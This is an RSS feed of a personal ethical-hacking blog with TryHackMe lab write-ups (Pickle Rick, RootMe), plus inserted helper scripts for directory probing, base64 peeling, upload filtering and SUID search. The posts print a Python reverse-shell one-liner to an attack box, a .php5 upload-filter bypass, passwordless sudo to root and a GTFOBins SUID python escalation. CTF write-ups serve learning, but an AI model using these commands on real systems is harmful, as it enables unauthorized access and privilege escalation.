<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Dustin's Ethical Hacking Progress Blog]]></title><description><![CDATA[A place where I document how I'm able to get through TryHackMe boxes, as well as anything else I find interesting within the Umbrella of ethical hacking.]]></description><link>https://blog.dustinsmith.ca</link><generator>RSS for Node</generator><lastBuildDate>Wed, 27 May 2026 06:14:50 GMT</lastBuildDate><atom:link href="https://blog.dustinsmith.ca/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Try Hack Me  | Pickle rick Day #2]]></title><description><![CDATA[Today's Date is April 19th, 2022.
I'm back at the PickleRick CTF Room in TryHackMe today. After a good day in the office, with a few hints from a friend, I'm back on track with a few potential leads.
As it turns out, the directory scanning tools I wa...]]></description><link>https://blog.dustinsmith.ca/try-hack-me-or-pickle-rick-day-2</link><guid isPermaLink="true">https://blog.dustinsmith.ca/try-hack-me-or-pickle-rick-day-2</guid><dc:creator><![CDATA[Dustin Smith]]></dc:creator><pubDate>Wed, 20 Apr 2022 03:17:58 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1650424659200/k60Jyt5hv.PNG" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Today's Date is April 19th, 2022.</p>
<p>I'm back at the PickleRick CTF Room in TryHackMe today. After a good day in the office, with a few hints from a friend, I'm back on track with a few potential leads.</p>
<p>As it turns out, the directory scanning tools I was using yesterday have some additional features I was unaware of. One of them is an option for a second loop that appends each file extension you care about to every word in the wordlist. That means yesterday I was ONLY searching for directories, not for files inside those directories (or at the web root). Turns out searching for files is a pretty important part of reconnaissance.</p>
<p>When using Gobuster there is an additional flag I could have been using: -x (file extensions). It is used like so:</p>
<p>gobuster dir -u url.to.website -w path/to/wordlist -x ext,ext2,ext3,ext4 -t (threadcount)</p>
<p>This will check each word in the wordlist, such as 'portal', on its own, as well as with each extension you specify. 
This means that a word such as "portal" now gets the following checks (one request each, so the request count grows to (1 + number of extensions) times the wordlist size):
url/portal
url/portal.ext
url/portal.ext2
url/portal.ext3
url/portal.ext4 </p>
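<p>To make the extension loop concrete, here is an added example (my own code, not gobuster's and not part of the original post) that reimplements the -x expansion with a pluggable fetcher. The target URL, the mini wordlist and the fake site it probes are constructed for the demo; the http_status function is the one you would plug in against a live box.</p>

```python
# Added example (not from the original post): a small, pluggable reimplementation
# of what `gobuster dir -x` does, so the extension loop is visible. Every name
# here (target URL, wordlist, the fake site) is an assumption for the demo.
from __future__ import annotations
import urllib.error
import urllib.request
from typing import Callable, Iterable, Iterator
from urllib.parse import urlsplit

# Status codes worth reporting. gobuster's default is "anything but 404".
INTERESTING = {200, 204, 301, 302, 307, 308, 401, 403, 405}


def expand_wordlist(words: Iterable[str], extensions: Iterable[str]) -> Iterator[str]:
    """Yield each word bare, then once per extension (that is the -x loop).
    Request count becomes len(words) * (1 + len(extensions))."""
    exts = [e.strip().lstrip(".") for e in extensions if e.strip()]
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):      # blank lines and wordlist comments
            continue
        yield word
        for ext in exts:
            yield f"{word}.{ext}"


def probe(base_url: str, words: Iterable[str], extensions: Iterable[str],
          fetch: Callable[[str], int]) -> list[tuple[str, int]]:
    """Request every candidate and return (path, status) for interesting ones."""
    base = base_url.rstrip("/")
    hits = []
    for path in expand_wordlist(words, extensions):
        status = fetch(f"{base}/{path}")
        if status in INTERESTING:
            hits.append((f"/{path}", status))
    return hits


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx, so a /assets -> /assets/ redirect is
    reported as 301 rather than as the 200 it redirects to."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def http_status(url: str, timeout: float = 5.0) -> int:
    """Real fetcher for live use: HTTP status for url, 404 if no response."""
    req = urllib.request.Request(url, headers={"User-Agent": "dir-probe/0.1"})
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except urllib.error.URLError:
        return 404


# Constructed stand-in for the target, keyed by path, so the demo runs offline.
FAKE_SITE = {"/assets": 301, "/login.php": 200, "/portal.php": 302,
             "/robots.txt": 200, "/server-status": 403}
# Constructed mini wordlist; a real run uses directory-list-2.3-medium.txt.
WORDS = ["# comment", "assets", "login", "portal", "robots", "server-status", ""]


def fake_fetch(url: str) -> int:
    return FAKE_SITE.get(urlsplit(url).path, 404)


if __name__ == "__main__":
    print("no -x    :", probe("http://target", WORDS, [], fake_fetch))
    print("-x php,txt:", probe("http://target", WORDS, ["php", "txt"], fake_fetch))
```

<p>Run without extensions, the fake site only yields /assets and /server-status, which is exactly the Day 1 result; with -x php,txt the same wordlist also surfaces login.php, portal.php and robots.txt. Swap fake_fetch for http_status to run it against a real target (and lower the thread-free pace if the box rate-limits you).</p>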
<p>This was a missing piece in yesterday's puzzle.</p>
<p>After running this command: </p>
<p>gobuster dir -u PickleRickIP.p.thmlabs.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,jpeg,php,gif -t 10</p>
<p>we find a few pages:</p>
<p>portal.php
login.php</p>
<p>Here we have a username and a login page. 
Before we try anything fancy, let's just try the username R1ckRul3s with the password found in robots.txt, Wubbalubbadubdub.</p>
<p>Looks like we got lucky. This gets us in, and we're able to see a myriad of options, most of which seem to be locked behind some sort of admin-level permission... the 'real' Rick. Fortunately we have an input panel. Not sure what it does, but let's try stuff!</p>
<p>Back when I did the <a target="_blank" href="https://tryhackme.com/room/owasptop10">OWASP top 10</a> training room on TryHackMe, I learned about some XSS attacks. I am curious to know if anything like that works here...</p>
<p>I tried to create a basic popup alert, but to no avail.</p>
<p>Seems like no? But I haven't exhausted all options. A plain script tag is prone to not working; generally the payload needs to be masked as something like an onerror handler on an image tag that fails to load, so it doesn't get caught by basic WAFs or input filters.</p>
<p>Anyways, while inspecting the webpage I was able to find a weird comment that looked like a base64 string. I could tell from the double == padding at the end, and from the fact that every character was in the 64-character set base64 uses (2^6 unique characters). 
Something strange happened though: when I tried to punch it into an online base64 decoder, it told me 'malformed input'! Took me a second to figure out what was going on, but I am nothing if not stubborn. I was sure I recognized something fishy going on, so I was persistent, and punched it into a program I built some time ago that would, let's call it, 'naively' follow the algorithm: take the input 6 bits at a time (one base64 character each) and regroup those bits into 8-bit bytes (the 256-value byte/ASCII range)... and when it was done, it still looked like base64. WHAT?</p>
<p>so I did it again...
and again...
and again...
again!?
again...</p>
<p> Eventually baking my way all the way down this list... 
 Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==</p>
<p> to this: VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA= 
 to this: VjFSSmVGSXlSbGRpU0ZKcFVrVktTMVZxU205TmJHeHlXa1phVVZWVU1Eaz0 
 to this: V1RJeFIyRldiSFJpUkVKS1VqSm9NbGxyWkZaUVVUMDk=
 to this: WTIxR2FWbHRiREJKUjJoMllrZFZQUT09
 to this: Y21GaVltbDBJR2h2YkdVPQ==
 to this: cmFiYml0IGhvbGU=
 to this: rabbit hole </p>
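<p>Here is an added example (my own code, not the decoder from the post) of the "keep peeling until it stops being base64" loop, including the padding repair that gets past the 'malformed input' error: it strips whatever '=' is there and re-pads to a multiple of four before decoding. The nested sample is constructed inline by re-encoding the string; the one page-sourced check uses the last two layers of the chain above.</p>

```python
# Added example (not from the original post): peel nested base64 layers until
# the result is no longer base64 that decodes to readable text. The nested
# sample is constructed by wrap(); only "cmFiYml0IGhvbGU=" and its parent come
# from the chain in the post.
from __future__ import annotations
import base64
import binascii
import re
import string

_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_PRINTABLE = set(string.printable)


def repad(s: str) -> str:
    """Normalise padding: drop any '=' and add exactly what the length needs.
    An extra or missing '=' is what makes strict decoders say 'malformed'."""
    s = s.strip().rstrip("=")
    return s + "=" * (-len(s) % 4)


def decode_layer(s: str) -> str | None:
    """Decode one layer; None if it is not base64 or does not yield text."""
    s = repad(s)
    if not _B64.match(s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text or not set(text) <= _PRINTABLE:
        return None          # binary junk: we went one layer too far, stop
    return text


def peel(s: str, max_depth: int = 32) -> tuple[str, list[str]]:
    """Return (final text, all layers) where layers[0] is the input."""
    layers = [s.strip()]
    for _ in range(max_depth):
        nxt = decode_layer(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers[-1], layers


def wrap(text: str, depth: int) -> str:
    """Constructed test data: base64-encode `text` `depth` times over."""
    for _ in range(depth):
        text = base64.b64encode(text.encode()).decode()
    return text


if __name__ == "__main__":
    final, layers = peel(wrap("rabbit hole", 7) + "=")   # extra '=' on purpose
    for i, layer in enumerate(layers):
        print(f"layer {i}: {layer}")
    print("final:", final)
```

<p>The stop condition matters: a string like "abcd" is syntactically valid base64 but decodes to non-text bytes, so the loop refuses to peel it and returns it as the answer rather than handing you garbage.</p>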
<p> And that's exactly what it felt like I was doing... going way down a rabbit hole, just hoping to get lucky. Now I'm here and not sure what to do with the information, other than to execute it as a command...
 nothing.</p>
<p> Well, I SUPPOSE something I could try would be to input an actual Ubuntu command, since I know this box is running Ubuntu (I discovered this yesterday).</p>
<p> 'ls'
 ... I found a clue! (clue.txt), and (Sup3rS3cretPickl3Ingred.txt). Perhaps this is the first ingredient. I'll cat this file to read its contents from the command panel next. Hopefully other commands work just the same...</p>
<p> In fact, after I try this, perhaps I'll try launching a reverse shell to a netcat listener, just so I can work a little more easily than through this website's input box. Anyways.</p>
<p> 'cat Sup3rS3cretPickl3Ingred.txt'</p>
<p> Fail! This command was disabled to make it more difficult for future Rick (which I guess is me?!). So sad.</p>
<p> Maybe I can just open it like I did robots.txt earlier. 
 Success! I have discovered the first ingredient.</p>
<p> 'https://PickleRickIP.p.thmlabs.com/Sup3rS3cretPickl3Ingred.txt'
 mr. meeseek hair</p>
<p> I wonder what's in clue.txt...
The clue is to look around the file system for the other ingredients!</p>
<p> Using the 'pwd' command, it appears I am currently in the /var/www/html directory. Time to look around.</p>
<p>I seem to be unable to traverse directories (most likely each command the panel runs starts as a fresh process, so a 'cd' doesn't stick), so I'll have to search from here using full paths.
ls /home shows me there are two users, 'rick' and 'ubuntu'.
In rick's home directory there is a file called 'second ingredients'.</p>
<p>Alright, so I plugged away as best as I could using the command line baked into this website, but honestly it was kind of brutal. I tried using netcat, but this device doesn't seem to have netcat installed. I ended up using a python3 one-liner from <a target="_blank" href="https://www.revshells.com/">revshells.com</a>:</p>
<p>python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKBOX IP",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'</p>
<p>to pop a reverse shell to the netcat listener I had running on my machine using nc -lvnp 1337.</p>
<p>Time to upgrade this guy to a more stable shell. I can do this easily with a command I have used in the past.
Because I already know www-data (the user I am now) can run python3, I can use this:</p>
<p>python3 -c 'import pty; pty.spawn("/bin/bash")'</p>
<p>to have a stable shell.</p>
<p>Now, I can either look around and see what I can find, or I can attempt to escalate privileges. I'd like to do that first.</p>
<p>Let's try sudo, just to see if I can...</p>
<p>sudo -l is a great one to try first. It lists everything my user is allowed to run with sudo, and whether a password is needed.</p>
<p>Well, that worked... it didn't even ask for a password. I can do it all.</p>
<p>can I have root?</p>
<p>sudo bash</p>
<p>I can. :^)</p>
<p>I wonder what I can find now!</p>
<p>I'm not sure where to start, but what I can do is start from the top of the directory tree and work my way down. I know the second ingredient is in /home/rick/second ingredients, but I don't know what to do with that yet. I couldn't get to it earlier when I couldn't use 'cat' from the web portal, but maybe I can now.</p>
<p>I accidentally stumbled on the 3rd ingredient: fleeb juice. 
It was just sitting in root's home directory.</p>
<p>As it turns out, the second ingredient was as simple as 
'cat "/home/rick/second ingredients"'
1 jerry tear
I just couldn't use that command from the web UI.</p>
<p>I think my biggest takeaways from completing this CTF are that I need to start doing the obvious things first. I probably could've saved an hour of pondering time had I just tried 'ls' in that command box in the first place, instead of thinking 'rick' would've had custom obfuscated commands somehow baked into his web front end. </p>
<p>Further to this, more experience with the tools I am using, as well as with whatever other tools are out there, will come in handy big time. I got lucky a few times (like with the python3 script just sort of working... why would this server have python3 in the first place?), so some takeaways are definitely to become more comfortable enumerating, or perhaps to have a sort of 'plan of attack' where I have a bunch of standard practices lined up, either in my head or on paper, for 'things to do when x happens'.</p>
<p>anyways, That's the box!</p>
]]></content:encoded></item><item><title><![CDATA[TryHackMe | PickleRick CTF Day #1]]></title><description><![CDATA[Today's date is Monday, April 18th, 2022.
A link to the box can be found here! 
This CTF is going to be a bit of a challenge for me. there are a bunch of things to learn along the way to complete this CTF, but it was posed to me as a challenge to hav...]]></description><link>https://blog.dustinsmith.ca/tryhackme-or-picklerick-ctf-day-1</link><guid isPermaLink="true">https://blog.dustinsmith.ca/tryhackme-or-picklerick-ctf-day-1</guid><dc:creator><![CDATA[Dustin Smith]]></dc:creator><pubDate>Tue, 19 Apr 2022 04:32:12 GMT</pubDate><content:encoded><![CDATA[<p>Today's date is Monday, April 18th, 2022.</p>
<p>A link to the box can be found <a target="_blank" href="https://tryhackme.com/room/picklerick">here</a>! 
This CTF is going to be a bit of a challenge for me. There are a bunch of things to learn along the way to complete this CTF, but it was posed to me as a challenge to have completed by the end of the week. </p>
<p>The CTF in its entirety is to find the three ingredients Rick, the mad scientist from the adult cartoon Rick and Morty, needs to create a potion he can take to undo the effects of a previous experiment gone wrong, wherein he turned himself into a pickle, hence the name PickleRick.</p>
<p>The only task TryHackMe is concerned about is finding the ingredients for the potion. To do this I'll need to do some reconnaissance.</p>
<p>Upon opening the website, I am prompted by Rick to help him remember his password... I don't even know where to log in with a username or password, let alone what they are... time to open up the dev tools.</p>
<p>Upon inspecting the home page, I'm able to find a username left as a comment in the HTML code. It's 'R1ckRul3s'.</p>
<p>This site is using Bootstrap v3.4.0, and jquery v3.3.1
There are no cookies present at this time that could be manipulated yet.
There are no service workers present at this time.</p>
<p>Given I have nothing else to go on... I think it's time to use some tools.
I'll do an nmap scan of the site using the following command: "nmap -sC -sV (machine ip)"</p>
<p>While this is running, I might as well find whatever directories might be available, since that'll take some time, too.</p>
<p>using the following command: "gobuster dir -u https://10-10-193-191.p.thmlabs.com/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50"</p>
<p>while gobuster was running, nmap finished.</p>
<p>looks like port 22 and port 80 are open.
22/tcp ssh using OpenSSH 7.2p2
80/tcp http using Apache httpd 2.4.18
These are running on an ubuntu server.</p>
<p>While gobuster is running, I decided to start poking around at some commonly used directories.. robots.txt has a single line, "Wubbalubbadubdub", which is Rick's catchphrase. lol.
I wonder if that could be his password, too. haha!</p>
<p>Come to think of it, I should try SSH with no username/password. just in case... No dice.
Maybe with the username I found earlier?
still no dice. </p>
<p>I wonder if there are ingredients listed in the actual show that could point me towards some answers.. would that be considered OSINT? Not in the spirit of the trial, at least. I'll maybe give it a watch when I'm done.</p>
<p>gobuster has come back with a few directories so far. 
/assets with a 301 (redirect)
/server-status with a 403 (forbidden)</p>
<p>I decided to check out /assets, but nothing stood out to me as apparently vulnerable. I wonder if the site itself could be. I'll check out this version of Apache on exploit-db next.
Either I don't know how to use exploit-db, or there was nothing I'm able to do yet without being able to upload a file. </p>
<p>I'm going to go back to nmap and try some more exhaustive scans, including a UDP scan (-sU), as well as scanning all ports (-p-) rather than the top 1000. I feel like using a random port would be within the realm of possibilities for Rick. </p>
<p>(10 mins or so passed here)</p>
<p>Well, this is taking forever, so I'm going to run a dirbuster scan on top of that gobuster scan... gobuster didn't find robots.txt and that seems strange to me...
(some time passed..) Hah! dirbuster found robots.txt. Isn't that neato.</p>
<p>That UDP scan came back with some things.
68 - open|filtered - dhcpc
1001 - open|filtered - unknown
36893 - open|filtered - unknown
I feel like these are some clues, but I couldn't tell you what they point to at this moment... (One caveat: open|filtered means nmap got no reply at all, so it cannot tell an open UDP port from one whose probe a firewall silently dropped; none of these is a confirmed open port.)</p>
<p>dirbuster also found another page, index.html... given this is the default index document for an Apache site, I probably should have guessed this would show up on the scan regardless.</p>
<p>Tomorrow I get to do some research into how open UDP ports might be exploited, because I think that is my next step. </p>
<p>To be continued...</p>
]]></content:encoded></item><item><title><![CDATA[TryHackMe | RootMe]]></title><description><![CDATA[1. Deploy the Machine
Standard, nothing to note here.
2. Reconnaissance
Scan the machine, how many ports are open?
Nmap is  free and open source utility for network discovery and security.
Nmap.org
I'll use it to map our which ports are open on the m...]]></description><link>https://blog.dustinsmith.ca/tryhackme-or-rootme</link><guid isPermaLink="true">https://blog.dustinsmith.ca/tryhackme-or-rootme</guid><dc:creator><![CDATA[Dustin Smith]]></dc:creator><pubDate>Sun, 17 Apr 2022 21:59:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1650260914489/szt0Aoyvg.PNG" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-1-deploy-the-machine">1. Deploy the Machine</h1>
<p>Standard, nothing to note here.</p>
<h1 id="heading-2-reconnaissance">2. Reconnaissance</h1>
<p>Scan the machine, how many ports are open?
Nmap is a free and open source utility for network discovery and security auditing.
<a target="_blank" href="https://nmap.org/">Nmap.org</a>
I'll use it to map out which ports are open on the machine.
The Nmap scan I will run on this machine is:
nmap -sC -sV (machine IP)
-sC runs Nmap's default set of NSE scripts against each open port it finds (banner grabbing, basic service checks, and so on).
-sV enables service/version detection, which identifies the service behind each open port and its version where possible.</p>
<h3 id="heading-scan-the-machine-using-nmaphttpsnmaporg">Scan the Machine using <a target="_blank" href="https://nmap.org/">Nmap</a></h3>
<p>Using nmap -sC -sV (machine_IP), I was able to find two open ports, 
22, which is running the service ssh, using OpenSSH version 7.6p1, on an Ubuntu Server.
80, which is running the service http, using apache 2.4.29, on an Ubuntu Server.
More information on how I use Nmap can be found here:
<a target="_blank" href="https://blog.dustinsmith.ca/network-mapping-or-nmap">Network Mapping | Nmap</a></p>
<h3 id="heading-finding-directories-using-gobusterhttpswwwkaliorgtoolsgobuster">Finding Directories using <a target="_blank" href="https://www.kali.org/tools/gobuster/">GoBuster</a></h3>
<p>Once I knew there was an HTTP site running, I had a few options for enumerating directories on it. GoBuster was one, but Dirbuster and ffuf were other options I could have used.</p>
<p>The command I used was:
"gobuster dir -u http://(machine_ip) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50"</p>
<p>This took some time. Let me break down for you what this command is doing.
'gobuster' is the application call.
'dir' selects directory/file enumeration mode.
'http://(machine_ip)' is the base URL of the target site (here an IP address rather than a hostname).
'-w (file_path)' designates the wordlist for GoBuster to use. 
'-t 50' is the number of concurrent threads, i.e. how many requests are in flight against the site at once. The default is 10, but I used 50 because I am impatient and 10 was taking too long. </p>
<h3 id="heading-results-of-gobuster">Results of GoBuster</h3>
<p>Eventually, a few directories were found.
/panel/, /uploads/, /css/, /js/, </p>
<p>Something to take note of is that under /panel/ we are able to upload arbitrary files, which we can then view at /uploads/.
Perhaps we can use this to upload something executable...</p>
<h1 id="heading-3-getting-a-shell">3. Getting a Shell</h1>
<p>Getting a reverse shell can sometimes be done by opening a listener on your attacker machine (netcat, say), uploading a .php file with a malicious payload, then 'opening' that file in the browser so the server executes the payload, which calls home to your listener.</p>
<p>Online I was able to find this site: <a target="_blank" href="https://www.revshells.com/">https://www.revshells.com/</a>, which has many pre-built 'reverse shell' payloads available. Now that I have a reverse shell payload selected, I'll set up my netcat listener.</p>
<p>nc -lvnp 1337
'nc' designates the application call for '<a target="_blank" href="https://www.kali.org/tools/netcat/#:~:text=Packages%20and%20Binaries%3A-,netcat%2Dtraditional,by%20other%20programs%20and%20scripts.">netcat</a>'
'-lvnp 1337', l = listen mode, v = verbose, n = numeric ip address (no dns), p 1337 = which local port to listen on.</p>
<p>I am using the 'PHP PentestMonkey' reverse shell template, and have created a file called 'RevShell.php' with the payload in it (the IP and port at the top of the template need to match your listener). 
I also ran the following to make the file executable:
'sudo chmod +x RevShell.php'
This step turns out not to matter: the execute bit on my local copy is not carried over by the upload, and the web server runs PHP files through its PHP handler rather than executing them directly. Now, I'll go to (machine_ip)/panel/ to upload my file.</p>
<p>BUT! It looks like the upload of .php files is blocked!
Time to find a way around this...</p>
<h2 id="heading-file-upload-restriction-bypass">File Upload Restriction Bypass</h2>
<p>I could probably write an entire blog on this, but for the purposes of this room in TryHackMe, there are a few specifics you need to know...
Some websites whitelist or blacklist file uploads by extension. The .php extension is blocked in this case, and we need to find a way to upload our payload so that the remote machine will still execute it as PHP. 
For more information, here is an awesome article from exploit-db.com:
<a target="_blank" href="https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf">File Upload Restriction Bypass</a></p>
<p>Anyways, this part will take some trial and error until you find a way past the website's blacklisting of file extensions.
Eventually, I found that 'RevShell.php5' uploaded successfully, and browsing to it under /uploads/ was enough to run it: the blacklist only looks for '.php', while Apache's PHP handler is commonly mapped to alternative extensions such as .php5, .phtml or .phar as well, so the server still executes the file as PHP. (The local chmod +x makes no difference here.) </p>
<p>With any luck, you should now see a shell open in your netcat terminal. This isn't a stable shell though, and if you're not careful (a stray Ctrl-C, for instance) you'll have to re-establish the session... let's spawn a proper TTY using python!</p>
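<p>The room's server-side code is not shown, so here is an added example (my own code, not the room's and not part of the original post) of the kind of extension blacklist that .php5 slips past, beside a stricter allow-list check. The names, the allowed image extensions and the list of extensions a PHP handler may be mapped to are assumptions; check the target's Apache handler config rather than trusting that list.</p>

```python
# Added example (not from the original post): a weak deny-list upload check of
# the kind the .php5 trick bypasses, next to an allow-list version. Extension
# sets and function names are assumptions for the demo.
from __future__ import annotations
import os
import re

# Weak check in the style that fails on the room: deny one spelling of one extension.
DENY_LIST = {".php"}

# Stricter check: allow only what the feature needs.
ALLOW_LIST = {".jpg", ".jpeg", ".png", ".gif"}

# Extensions a PHP handler is commonly mapped to (assumed set; verify against
# the target's AddHandler/FilesMatch configuration).
PHP_LIKE = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}


def deny_list_check(filename: str) -> bool:
    """True if the weak check would accept the upload (compares the final
    extension, case-sensitively, against DENY_LIST)."""
    return os.path.splitext(filename)[1] not in DENY_LIST


def allow_list_check(filename: str) -> bool:
    """True only for a plain basename with exactly one, allowed extension:
    no path separators or NULs, no double extensions (shell.php.jpg), no
    trailing dot, case-insensitive comparison."""
    if any(c in filename for c in "/\\\x00") or filename.startswith("."):
        return False
    parts = filename.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False
    return "." + parts[1] in ALLOW_LIST


def bypass_candidates(stem: str = "RevShell") -> list[str]:
    """Filenames a tester tries against a deny-list filter, as the post did."""
    names = [stem + ext for ext in sorted(PHP_LIKE - DENY_LIST)]
    names += [stem + ".PHP", stem + ".php.jpg", stem + ".php."]  # case / double ext / trailing dot
    return names


def compare(filenames: list[str]) -> dict[str, tuple[bool, bool]]:
    """Map each name to (accepted by deny list, accepted by allow list)."""
    return {f: (deny_list_check(f), allow_list_check(f)) for f in filenames}


if __name__ == "__main__":
    for name, (weak, strict) in compare(bypass_candidates() + ["picture.jpg"]).items():
        print(f"{name:22} deny-list: {'accept' if weak else 'reject':6}  allow-list: {'accept' if strict else 'reject'}")
```

<p>Every bypass candidate gets through the deny list and none gets through the allow list. Even the allow list only governs names, though: what actually executes is decided by the web server's handler mapping, so the real fix on the server side is to also disable script execution in the upload directory (or store uploads outside the web root altogether).</p>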
<p>python -c 'import pty;pty.spawn("/bin/bash")' should do the trick.</p>
<p>Now that we have a bash shell open, let's look for that user.txt flag.</p>
<h2 id="heading-finding-files-in-linux">Finding files in linux</h2>
<p>We can use the 'find' tool to find specific files on a Linux system.
'find / -type f -name file-to-find.ext' is the format (append 2&gt;/dev/null to hide the permission-denied errors from directories we can't read). 
Looks like there are a bunch of directories we don't have access to yet; luckily, the file we were looking for happens to be somewhere that we can access!</p>
<p>The first thing you might want to do when you finally get a shell on a machine is celebrate, but there might be heavy restrictions on the user-level permissions you've obtained. Check around using some of the following commands:
whoami
sudo -l</p>
<h1 id="heading-4-privilege-escalation">4. Privilege Escalation</h1>
<p>Now that we have a shell, let's escalate our privileges to root.
We're prompted here to find files with SUID permissions. 
SUID means 'Set owner User ID'. If an executable has this bit set, then when it is run its effective user ID becomes that of the file's owner instead of the user running it, so a SUID binary owned by root runs with root's privileges. </p>
<p>We can search for such files using the following command.
find / -user root -perm -4000 -print 2&gt;/dev/null</p>
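<p>As an added example (my own code, not part of the original post), here is the same SUID search done with os.walk and stat, which makes the permission bits and the 2&gt;/dev/null behaviour explicit. It is exercised on a constructed temporary tree rather than the real filesystem; the file names in that tree are assumptions for the demo, and on a real box you would call find_suid("/", owner_uid=0).</p>

```python
# Added example (not from the original post): the post's
# `find / -user root -perm -4000 -print 2>/dev/null`, as a Python walker,
# demonstrated on a constructed temp tree. Paths are assumptions.
from __future__ import annotations
import os
import stat
import tempfile


def is_setuid(st: os.stat_result) -> bool:
    """Regular file with the setuid bit (the 4 in 4000 / -perm -4000)."""
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(root: str, owner_uid: int | None = None) -> list[str]:
    """Setuid regular files under root. owner_uid=0 matches '-user root';
    None lists setuid files of any owner. Unreadable directories are
    skipped silently, which is what the 2>/dev/null in the post achieves."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        # Like find, don't descend into symlinked directories (avoids loops).
        dirnames[:] = [d for d in dirnames if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)           # lstat: a symlink is never "setuid"
            except OSError:
                continue
            if is_setuid(st) and (owner_uid is None or st.st_uid == owner_uid):
                hits.append(path)
    return sorted(hits)


def make_demo_tree() -> tuple[str, list[str]]:
    """Constructed sample: a temp tree with one setuid file, one plain file
    and one setgid-only file. Returns (root, paths whose setuid bit stuck),
    so the expectation reflects what the filesystem actually allowed."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    os.makedirs(os.path.join(root, "usr", "bin"))
    os.makedirs(os.path.join(root, "home", "rick"))
    expected = []
    for rel, mode in (("usr/bin/python", 0o4755),   # setuid: should be found
                      ("usr/bin/ls", 0o755),        # ordinary executable
                      ("home/rick/notes", 0o2755)): # setgid only: not setuid
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
        if is_setuid(os.stat(path)):
            expected.append(path)
    return root, sorted(expected)


if __name__ == "__main__":
    root, expected = make_demo_tree()
    print("demo tree:", find_suid(root))
    print("real box (root-owned only):", find_suid("/", owner_uid=0))
```

<p>Running it against / as www-data reproduces the post's list; the interesting entries are the ones GTFOBins has a SUID section for, such as an interpreter like python that will happily keep the owner's effective UID.</p>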
<p>From here, look through the list and find an application whose permissions you might be able to leverage to execute arbitrary code as its owner. 
Python is a popular scripting language, so I bet we can do something with that. 
<a target="_blank" href="https://gtfobins.github.io/">GTFOBins</a> is an awesome resource for priv esc. I'm going to search for python here and find something I think I can use. (hint: SUID)</p>
<p>The snippet of code I found on GTFOBins to escalate privileges is:
 python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
which worked well. The -p flag matters: without it, sh notices that the effective UID differs from the real UID and drops the elevated privileges back to your own user.</p>
<p>Now we have root-level permissions, running in the shell we opened via python. 
Finally, we're prompted to find the root.txt flag, which we can do the same way we found the user.txt flag earlier!</p>
]]></content:encoded></item><item><title><![CDATA[Network Mapping | Nmap]]></title><description><![CDATA[Placeholder for now. will eventually add notes about how I use Nmap.]]></description><link>https://blog.dustinsmith.ca/network-mapping-or-nmap</link><guid isPermaLink="true">https://blog.dustinsmith.ca/network-mapping-or-nmap</guid><dc:creator><![CDATA[Dustin Smith]]></dc:creator><pubDate>Sun, 17 Apr 2022 21:59:02 GMT</pubDate><content:encoded><![CDATA[<p>Placeholder for now. will eventually add notes about how I use Nmap.</p>
]]></content:encoded></item></channel></rss>